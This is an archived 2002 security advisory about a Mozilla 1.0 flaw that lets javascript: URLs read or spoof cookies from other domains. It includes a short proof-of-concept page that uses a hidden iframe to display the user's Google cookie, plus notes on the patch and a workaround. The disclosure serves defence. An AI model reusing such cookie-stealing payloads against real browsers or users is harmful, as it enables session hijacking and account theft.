TUCoPS :: Browsers :: nscp5555.htm

Mozilla cookie can be stollen & spoofed
25th Jul 2002 [SBWID-5555]

	Mozilla cookie can be stollen & spoofed


	Mozilla 1.0


	Thanks to :

	                                                   _     _

	                                                 o' ,=./ `o

	Andreas Sandblad [sandblad@acc.umu.se]              (o o)        advisory [#9]


	Credits to Ingesson, Quitta, Hawkan.







	I orginally thought this was a XSS (cross  site  scripting)  issue,  but
	soon came to the conclusion that it is limited  to  a  design  error  in
	restricting access to cookies. Even though Mozilla  is  open  source,  I
	have not been studying the source code in order to find and exploit  the

	In the beginning I had problems not  generating  any  javascript  errors
	when using the javascript URL. My first solution was to  make  the  host
	and path to be a valid javascript expression. Google.com may be a  valid
	expression if google is an object and com is an element/variable of  the
	Google object. Further on if Google.com is an int, it is  legal  to  use
	google.com/ 1. Parsing of host and  path  will  stop  when  a  space  is

	Well, I soon found a much easier solution. Simply put a // in  front  of
	the host and path and a \n before the cookie reading  code  accour.  The
	reason why I didn't find this directly was because the newline  must  be
	created in a  javascript  function.  It  can't  be  set  directly  in  a
	javascript url.





	Mozilla allows script in  the  javascript  protocoll  to  set  and  read
	cookies. For javascript URLs the host and path for the cookie is  pulled
	out as: "javascript:[host][path]"

	Cookie security is based only on restricting access to correct  matching
	host and path. By carefully crafting a mallicious javascript URL  opened
	in a new  frame/iframe/window,  it  is  possible  to  access  and  alter
	cookies from other domains.





	The easiest way to exploit the  vulnerability  is  to  simply  create  a
	javascript     URL      in      a      javascript      function      as:
	javascript://[host]/[path]\n[code to read cookie] The // will make  sure
	host and path don't generate any javascript errors.





	Instructions: Put the exploit in a html document on a remote server  and
	load it with your Mozilla browser to activate the exploit.

	-------------------------- CUT HERE ----------------------------


	Title:      Mozilla cookie stealing/spoofing

	Date:       [2002-07-24]

	Impact:     Steal/spoof arbitrary cookie           _     _

	            using javascript: URLs               o' \,=./ `o

	Author:     Andreas Sandblad, sandblad@acc.umu.se   (o o)


	This demo will display your google cookie (must exist).



	<body onload=init()>

	<iframe name=f height=0 width=0 style=visibility:hidden></iframe>


	function init(){

	  f.location = "javascript://www.google.com/\n"+

	    "'<body onload=alert(document.cookie)>'";



	-------------------------- CUT HERE ----------------------------






	The author has been working with Mozilla to produce a patch. Problem  is
	fixed in Mozilla 1.1 Beta released 02-07-22.





	Preferences->Advanced->Scripts & Plugins->


	Disable access to cookies using javascript

TUCoPS is optimized to look best in Firefox® on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2024 AOH